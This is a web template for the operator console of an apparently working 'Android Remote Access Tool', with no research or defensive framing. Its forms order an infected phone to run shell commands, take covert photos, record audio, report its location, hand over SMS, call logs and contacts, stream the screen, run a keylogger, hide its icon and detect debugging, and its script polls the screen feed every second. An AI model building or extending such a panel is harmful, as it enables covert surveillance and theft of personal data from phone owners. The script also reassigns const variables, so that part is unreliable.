{% extends "layout.html" %}

{% block title %}Device Control - Android Remote Access Tool{% endblock %}

{% block content %}
<div class="row mb-4">
    <div class="col-md-12">
        <nav aria-label="breadcrumb">
            <ol class="breadcrumb">
                <li class="breadcrumb-item"><a href="{{ url_for('dashboard') }}">Dashboard</a></li>
                <li class="breadcrumb-item active" aria-current="page">{{ device.name or 'Unknown Device' }}</li>
            </ol>
        </nav>
    </div>
</div>

<div class="row">
    <div class="col-md-4">
        <!-- Device Info Card -->
        <div class="card mb-4">
            <div class="card-header d-flex justify-content-between align-items-center">
                <h5 class="mb-0"><i class="fas fa-info-circle"></i> Device Info</h5>
                <span id="device-status-indicator" 
                      class="badge {% if device.is_online %}bg-success{% else %}bg-danger{% endif %}"
                      data-last-seen="{{ device.last_online }}">
                    {% if device.is_online %}Online{% else %}Offline{% endif %}
                </span>
            </div>
            <div class="card-body">
                <ul class="list-group list-group-flush">
                    <li class="list-group-item d-flex justify-content-between align-items-center">
                        ID
                        <span class="text-monospace">{{ device.device_id }}</span>
                    </li>
                    <li class="list-group-item d-flex justify-content-between align-items-center">
                        Name
                        <span>{{ device.name or 'Unknown' }}</span>
                    </li>
                    <li class="list-group-item d-flex justify-content-between align-items-center">
                        Android Version
                        <span>{{ device.android_version or 'Unknown' }}</span>
                    </li>
                    <li class="list-group-item d-flex justify-content-between align-items-center">
                        IP Address
                        <span>{{ device.ip_address or 'Unknown' }}</span>
                    </li>
                    <li class="list-group-item d-flex justify-content-between align-items-center">
                        First Seen
                        <span>{{ device.first_seen.strftime('%Y-%m-%d %H:%M') if device.first_seen else 'Unknown' }}</span>
                    </li>
                    <li class="list-group-item d-flex justify-content-between align-items-center">
                        Last Active
                        <span>{{ device.last_online.strftime('%Y-%m-%d %H:%M') if device.last_online else 'Never' }}</span>
                    </li>
                </ul>
            </div>
        </div>

        <!-- Command Form Card -->
        <div class="card mb-4">
            <div class="card-header">
                <h5 class="mb-0"><i class="fas fa-terminal"></i> Commands</h5>
            </div>
            <div class="card-body">
                <ul class="nav nav-tabs" id="commandTabs" role="tablist">
                    <li class="nav-item" role="presentation">
                        <button class="nav-link active" id="shell-tab" data-bs-toggle="tab" data-bs-target="#shell" type="button" role="tab" aria-controls="shell" aria-selected="true">
                            <i class="fas fa-terminal"></i> Shell
                        </button>
                    </li>
                    <li class="nav-item" role="presentation">
                        <button class="nav-link" id="surveillance-tab" data-bs-toggle="tab" data-bs-target="#surveillance" type="button" role="tab" aria-controls="surveillance" aria-selected="false">
                            <i class="fas fa-eye"></i> Surveillance
                        </button>
                    </li>
                    <li class="nav-item" role="presentation">
                        <button class="nav-link" id="stealth-tab" data-bs-toggle="tab" data-bs-target="#stealth" type="button" role="tab" aria-controls="stealth" aria-selected="false">
                            <i class="fas fa-user-secret"></i> Stealth
                        </button>
                    </li>
                </ul>
                <div class="tab-content p-3 border border-top-0 rounded-bottom" id="commandTabsContent">
                    <!-- Shell Command Tab -->
                    <div class="tab-pane fade show active" id="shell" role="tabpanel" aria-labelledby="shell-tab">
                        <form method="POST" action="{{ url_for('send_command', device_id=device.id) }}">
                            <input type="hidden" name="command_type" value="shell">
                            <div class="mb-3">
                                <label for="command-input" class="form-label">Shell Command</label>
                                <div class="input-group">
                                    <span class="input-group-text">$</span>
                                    <input type="text" class="form-control" id="command-input" name="command" placeholder="ls -la">
                                </div>
                            </div>
                            <div class="d-grid gap-2">
                                <button type="submit" class="btn btn-primary">
                                    <i class="fas fa-paper-plane"></i> Send Command
                                </button>
                            </div>
                        </form>
                    </div>
                    
                    <!-- Surveillance Tab -->
                    <div class="tab-pane fade" id="surveillance" role="tabpanel" aria-labelledby="surveillance-tab">
                        <div class="row">
                            <!-- Camera -->
                            <div class="col-md-6 mb-3">
                                <div class="card h-100">
                                    <div class="card-header">
                                        <h6 class="mb-0"><i class="fas fa-camera"></i> Camera</h6>
                                    </div>
                                    <div class="card-body">
                                        <form method="POST" action="{{ url_for('send_command', device_id=device.id) }}">
                                            <input type="hidden" name="command_type" value="camera">
                                            <div class="mb-3">
                                                <label class="form-label">Camera</label>
                                                <select name="camera_id" class="form-select">
                                                    <option value="0">Back Camera</option>
                                                    <option value="1">Front Camera</option>
                                                </select>
                                            </div>
                                            <div class="d-grid gap-2">
                                                <button type="submit" class="btn btn-sm btn-danger">
                                                    <i class="fas fa-camera"></i> Capture Photo
                                                </button>
                                            </div>
                                        </form>
                                    </div>
                                </div>
                            </div>
                            
                            <!-- Microphone -->
                            <div class="col-md-6 mb-3">
                                <div class="card h-100">
                                    <div class="card-header">
                                        <h6 class="mb-0"><i class="fas fa-microphone"></i> Microphone</h6>
                                    </div>
                                    <div class="card-body">
                                        <form method="POST" action="{{ url_for('send_command', device_id=device.id) }}">
                                            <input type="hidden" name="command_type" value="microphone">
                                            <div class="mb-3">
                                                <label class="form-label">Duration (seconds)</label>
                                                <input type="number" name="duration" class="form-control" value="10" min="1" max="60">
                                            </div>
                                            <div class="d-grid gap-2">
                                                <button type="submit" class="btn btn-sm btn-danger">
                                                    <i class="fas fa-microphone"></i> Record Audio
                                                </button>
                                            </div>
                                        </form>
                                    </div>
                                </div>
                            </div>
                            
                            <!-- Location -->
                            <div class="col-md-6 mb-3">
                                <div class="card h-100">
                                    <div class="card-header">
                                        <h6 class="mb-0"><i class="fas fa-map-marker-alt"></i> Location</h6>
                                    </div>
                                    <div class="card-body">
                                        <form method="POST" action="{{ url_for('send_command', device_id=device.id) }}">
                                            <input type="hidden" name="command_type" value="location">
                                            <div class="text-center mb-3">
                                                <p class="small text-muted">Get current device GPS location and address.</p>
                                            </div>
                                            <div class="d-grid gap-2">
                                                <button type="submit" class="btn btn-sm btn-warning">
                                                    <i class="fas fa-map-marker-alt"></i> Get Location
                                                </button>
                                            </div>
                                        </form>
                                    </div>
                                </div>
                            </div>
                            
                            <!-- SMS/Calls/Contacts -->
                            <div class="col-md-6 mb-3">
                                <div class="card h-100">
                                    <div class="card-header">
                                        <h6 class="mb-0"><i class="fas fa-address-book"></i> Data Collection</h6>
                                    </div>
                                    <div class="card-body">
                                        <form method="POST" action="{{ url_for('send_command', device_id=device.id) }}">
                                            <div class="mb-3">
                                                <label class="form-label">Collection Type</label>
                                                <select name="command_type" class="form-select">
                                                    <option value="sms">SMS Messages</option>
                                                    <option value="calls">Call Logs</option>
                                                    <option value="contacts">Contacts</option>
                                                </select>
                                            </div>
                                            <div class="mb-3">
                                                <label class="form-label">Limit</label>
                                                <input type="number" name="limit" class="form-control" value="100" min="1">
                                            </div>
                                            <div class="d-grid gap-2">
                                                <button type="submit" class="btn btn-sm btn-info">
                                                    <i class="fas fa-download"></i> Collect Data
                                                </button>
                                            </div>
                                        </form>
                                    </div>
                                </div>
                            </div>
                            
                            <!-- Screen Capture/Streaming -->
                            <div class="col-md-12 mb-3">
                                <div class="card">
                                    <div class="card-header">
                                        <h6 class="mb-0"><i class="fas fa-desktop"></i> Screen Capture & Streaming</h6>
                                    </div>
                                    <div class="card-body">
                                        <div class="row mb-3">
                                            <div class="col-md-4">
                                                <form method="POST" action="{{ url_for('send_command', device_id=device.id) }}">
                                                    <input type="hidden" name="command_type" value="screen_capture">
                                                    <button type="submit" class="btn btn-sm btn-info w-100">
                                                        <i class="fas fa-camera"></i> Capture Screenshot
                                                    </button>
                                                </form>
                                            </div>
                                            <div class="col-md-4">
                                                <form method="POST" action="{{ url_for('send_command', device_id=device.id) }}">
                                                    <input type="hidden" name="command_type" value="screen_stream_start">
                                                    <input type="hidden" name="interval" value="1.0">
                                                    <button type="submit" class="btn btn-sm btn-success w-100">
                                                        <i class="fas fa-play"></i> Start Stream
                                                    </button>
                                                </form>
                                            </div>
                                            <div class="col-md-4">
                                                <form method="POST" action="{{ url_for('send_command', device_id=device.id) }}">
                                                    <input type="hidden" name="command_type" value="screen_stream_stop">
                                                    <button type="submit" class="btn btn-sm btn-danger w-100">
                                                        <i class="fas fa-stop"></i> Stop Stream
                                                    </button>
                                                </form>
                                            </div>
                                        </div>
                                        <div id="screen-display" class="text-center">
                                            {% if screen_data %}
                                            <img id="screen-image" src="data:image/png;base64,{{ screen_data }}" class="img-fluid border rounded" alt="Screen capture">
                                            <p class="small text-muted mt-2">Last updated: <span id="screen-timestamp">{{ screen_timestamp }}</span></p>
                                            {% else %}
                                            <div class="alert alert-secondary">
                                                <i class="fas fa-info-circle"></i> No screen data available. Capture a screenshot or start streaming.
                                            </div>
                                            {% endif %}
                                        </div>
                                    </div>
                                </div>
                            </div>
                            
                            <!-- Keylogger -->
                            <div class="col-md-12 mb-3">
                                <div class="card">
                                    <div class="card-header">
                                        <h6 class="mb-0"><i class="fas fa-keyboard"></i> Keylogger</h6>
                                    </div>
                                    <div class="card-body">
                                        <form method="POST" action="{{ url_for('send_command', device_id=device.id) }}">
                                            <input type="hidden" name="command_type" value="keylogger">
                                            <div class="row">
                                                <div class="col-md-6">
                                                    <div class="form-check">
                                                        <input class="form-check-input" type="radio" name="enable" id="keylogger-enable" value="true" checked>
                                                        <label class="form-check-label" for="keylogger-enable">
                                                            <i class="fas fa-play"></i> Enable Keylogger
                                                        </label>
                                                    </div>
                                                </div>
                                                <div class="col-md-6">
                                                    <div class="form-check">
                                                        <input class="form-check-input" type="radio" name="enable" id="keylogger-disable" value="false">
                                                        <label class="form-check-label" for="keylogger-disable">
                                                            <i class="fas fa-stop"></i> Disable Keylogger
                                                        </label>
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="d-grid gap-2 mt-3">
                                                <button type="submit" class="btn btn-sm btn-secondary">
                                                    <i class="fas fa-keyboard"></i> Toggle Keylogger
                                                </button>
                                            </div>
                                        </form>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                    
                    <!-- Stealth Tab -->
                    <div class="tab-pane fade" id="stealth" role="tabpanel" aria-labelledby="stealth-tab">
                        <div class="row">
                            <!-- Hide App -->
                            <div class="col-md-6 mb-3">
                                <div class="card h-100">
                                    <div class="card-header">
                                        <h6 class="mb-0"><i class="fas fa-eye-slash"></i> Hide App</h6>
                                    </div>
                                    <div class="card-body">
                                        <form method="POST" action="{{ url_for('send_command', device_id=device.id) }}">
                                            <input type="hidden" name="command_type" value="hide_app">
                                            <div class="text-center mb-3">
                                                <p class="small text-muted">Hide the application icon from launcher and recent apps list.</p>
                                            </div>
                                            <div class="d-grid gap-2">
                                                <button type="submit" class="btn btn-sm btn-dark">
                                                    <i class="fas fa-eye-slash"></i> Hide Application
                                                </button>
                                            </div>
                                        </form>
                                    </div>
                                </div>
                            </div>
                            
                            <!-- Anti-Debug -->
                            <div class="col-md-6 mb-3">
                                <div class="card h-100">
                                    <div class="card-header">
                                        <h6 class="mb-0"><i class="fas fa-bug"></i> Anti-Debug</h6>
                                    </div>
                                    <div class="card-body">
                                        <form method="POST" action="{{ url_for('send_command', device_id=device.id) }}">
                                            <input type="hidden" name="command_type" value="anti_debug">
                                            <div class="text-center mb-3">
                                                <p class="small text-muted">Check if the app is being debugged or analyzed.</p>
                                            </div>
                                            <div class="d-grid gap-2">
                                                <button type="submit" class="btn btn-sm btn-secondary">
                                                    <i class="fas fa-bug"></i> Check for Debugging
                                                </button>
                                            </div>
                                        </form>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>

        <!-- File Transfer Card -->
        <div class="card">
            <div class="card-header">
                <h5 class="mb-0"><i class="fas fa-file-upload"></i> File Transfer</h5>
            </div>
            <div class="card-body">
                <form id="file-transfer-form" method="POST" action="{{ url_for('request_file_transfer', device_id=device.id) }}">
                    <div class="mb-3">
                        <label for="file-path-input" class="form-label">File Path on Device</label>
                        <input type="text" class="form-control" id="file-path-input" name="file_path" placeholder="/sdcard/Download/file.txt">
                    </div>
                    <div class="mb-3">
                        <label class="form-label">Direction</label>
                        <div class="form-check">
                            <input class="form-check-input" type="radio" name="direction" id="direction-download" value="download" checked>
                            <label class="form-check-label" for="direction-download">
                                <i class="fas fa-download"></i> Download (device to server)
                            </label>
                        </div>
                        <div class="form-check">
                            <input class="form-check-input" type="radio" name="direction" id="direction-upload" value="upload">
                            <label class="form-check-label" for="direction-upload">
                                <i class="fas fa-upload"></i> Upload (server to device)
                            </label>
                        </div>
                    </div>
                    <div class="d-grid gap-2">
                        <button type="submit" class="btn btn-primary">
                            <i class="fas fa-file-import"></i> Request Transfer
                        </button>
                    </div>
                </form>
            </div>
        </div>
    </div>

    <div class="col-md-8">
        <!-- Command History Card -->
        <div class="card mb-4">
            <div class="card-header">
                <h5 class="mb-0"><i class="fas fa-history"></i> Command History</h5>
            </div>
            <div class="card-body">
                <div id="command-history">
                    {% if commands %}
                    {% for command in commands %}
                    <div class="command-item" data-refreshed="true">
                        <div class="d-flex justify-content-between">
                            <div>
                                <strong>Command:</strong> 
                                <span class="command-text">{{ command.command_text }}</span>
                            </div>
                            <div>
                                <span class="command-status badge {% if command.status == 'executed' %}bg-success{% elif command.status == 'failed' %}bg-danger{% else %}bg-warning{% endif %}">
                                    {{ command.status }}
                                </span>
                            </div>
                        </div>
                        
                        {% if command.result %}
                        <div class="mt-2">
                            <strong>Output:</strong>
                            {% if command.type == 'camera' and command.status == 'executed' %}
                            <div class="command-result">
                                <div class="text-center">
                                    <img src="data:image/jpeg;base64,{{ command.result }}" class="img-fluid rounded" style="max-height: 300px;">
                                </div>
                            </div>
                            {% elif command.type == 'microphone' and command.status == 'executed' %}
                            <div class="command-result">
                                <div class="text-center">
                                    <audio controls>
                                        <source src="data:audio/wav;base64,{{ command.result }}" type="audio/wav">
                                        Your browser does not support the audio element.
                                    </audio>
                                </div>
                            </div>
                            {% elif command.type == 'location' and command.status == 'executed' %}
                            <div class="command-result">
                                {% set location = command.result|tojson|safe %}
                                <div class="row">
                                    <div class="col-md-6">
                                        <ul class="list-group">
                                            <li class="list-group-item d-flex justify-content-between">
                                                <span>Latitude:</span>
                                                <strong>{{ location.latitude }}</strong>
                                            </li>
                                            <li class="list-group-item d-flex justify-content-between">
                                                <span>Longitude:</span>
                                                <strong>{{ location.longitude }}</strong>
                                            </li>
                                            <li class="list-group-item d-flex justify-content-between">
                                                <span>Accuracy:</span>
                                                <strong>{{ location.accuracy }} meters</strong>
                                            </li>
                                        </ul>
                                    </div>
                                    <div class="col-md-6">
                                        <div class="alert alert-info">
                                            <strong>Address:</strong> {{ location.address or 'Not available' }}
                                        </div>
                                    </div>
                                </div>
                            </div>
                            {% else %}
                            <div class="command-result">{{ command.result }}</div>
                            {% endif %}
                        </div>
                        {% endif %}
                        
                        {% if command.error %}
                        <div class="mt-2">
                            <strong>Error:</strong>
                            <div class="command-error">{{ command.error }}</div>
                        </div>
                        {% endif %}
                        
                        <div class="text-muted small mt-2">
                            <span><i class="fas fa-clock"></i> Created: {{ command.created_at.strftime('%Y-%m-%d %H:%M:%S') }}</span>
                            {% if command.executed_at %}
                            <span class="ms-3"><i class="fas fa-check-circle"></i> Executed: {{ command.executed_at.strftime('%Y-%m-%d %H:%M:%S') }}</span>
                            {% endif %}
                        </div>
                        <hr>
                    </div>
                    {% endfor %}
                    {% else %}
                    <div class="alert alert-info">
                        <i class="fas fa-info-circle"></i> No commands have been sent to this device yet.
                    </div>
                    {% endif %}
                </div>
            </div>
        </div>

        <!-- File Transfer History Card -->
        <div class="card">
            <div class="card-header">
                <h5 class="mb-0"><i class="fas fa-exchange-alt"></i> File Transfer History</h5>
            </div>
            <div class="card-body">
                <div id="file-transfer-history">
                    {% if file_transfers %}
                    <div class="table-responsive">
                        <table class="table table-hover">
                            <thead>
                                <tr>
                                    <th>File</th>
                                    <th>Direction</th>
                                    <th>Size</th>
                                    <th>Status</th>
                                    <th>Date</th>
                                </tr>
                            </thead>
                            <tbody>
                                {% for transfer in file_transfers %}
                                <tr>
                                    <td>{{ transfer.file_name }}</td>
                                    <td>
                                        {% if transfer.direction == 'download' %}
                                        <i class="fas fa-download text-info"></i> Download
                                        {% else %}
                                        <i class="fas fa-upload text-primary"></i> Upload
                                        {% endif %}
                                    </td>
                                    <td>
                                        {% if transfer.file_size %}
                                        {{ transfer.file_size }} bytes
                                        {% else %}
                                        -
                                        {% endif %}
                                    </td>
                                    <td>
                                        <span class="badge {% if transfer.status == 'completed' %}bg-success{% elif transfer.status == 'failed' %}bg-danger{% else %}bg-warning{% endif %}">
                                            {{ transfer.status }}
                                        </span>
                                    </td>
                                    <td>{{ transfer.created_at.strftime('%Y-%m-%d %H:%M') }}</td>
                                </tr>
                                {% endfor %}
                            </tbody>
                        </table>
                    </div>
                    {% else %}
                    <div class="alert alert-info">
                        <i class="fas fa-info-circle"></i> No file transfers have been requested yet.
                    </div>
                    {% endif %}
                </div>
            </div>
        </div>
    </div>
</div>
{% endblock %}

{% block extra_scripts %}
<script>
    // Screen streaming functionality
    document.addEventListener('DOMContentLoaded', function() {
        // Check if we're on a page with a screen display
        const screenDisplay = document.getElementById('screen-display');
        const screenImage = document.getElementById('screen-image');
        const screenTimestamp = document.getElementById('screen-timestamp');
        
        if (screenDisplay) {
            console.log('Initializing screen streaming...');
            
            // Function to refresh the screen data
            function refreshScreenData() {
                console.log('Refreshing screen data...');
                
                // Make AJAX request to get latest screen data
                fetch('/api/screen_data/{{ device.id }}')
                    .then(response => {
                        if (!response.ok) {
                            throw new Error('Network response was not ok');
                        }
                        return response.json();
                    })
                    .then(data => {
                        if (data.screen_data) {
                            if (!screenImage) {
                                // Create new image element if it doesn't exist
                                const newImg = document.createElement('img');
                                newImg.id = 'screen-image';
                                newImg.className = 'img-fluid border rounded';
                                newImg.alt = 'Screen capture';
                                screenDisplay.innerHTML = '';
                                screenDisplay.appendChild(newImg);
                                
                                // Add timestamp paragraph
                                const timestampP = document.createElement('p');
                                timestampP.className = 'small text-muted mt-2';
                                timestampP.innerHTML = 'Last updated: <span id="screen-timestamp"></span>';
                                screenDisplay.appendChild(timestampP);
                                
                                // Update references
                                screenImage = document.getElementById('screen-image');
                                screenTimestamp = document.getElementById('screen-timestamp');
                            }
                            
                            // Update image source with new data
                            screenImage.src = 'data:image/png;base64,' + data.screen_data;
                            
                            // Update timestamp
                            if (screenTimestamp) {
                                const timestamp = new Date(data.timestamp);
                                screenTimestamp.textContent = timestamp.toLocaleString();
                            }
                        }
                    })
                    .catch(error => {
                        console.error('Error refreshing screen data:', error);
                    });
            }
            
            // Set interval to refresh screen data every 1 second
            const refreshInterval = setInterval(refreshScreenData, 1000);
            
            // Initial refresh
            refreshScreenData();
        }
    });
</script>
{% endblock %}
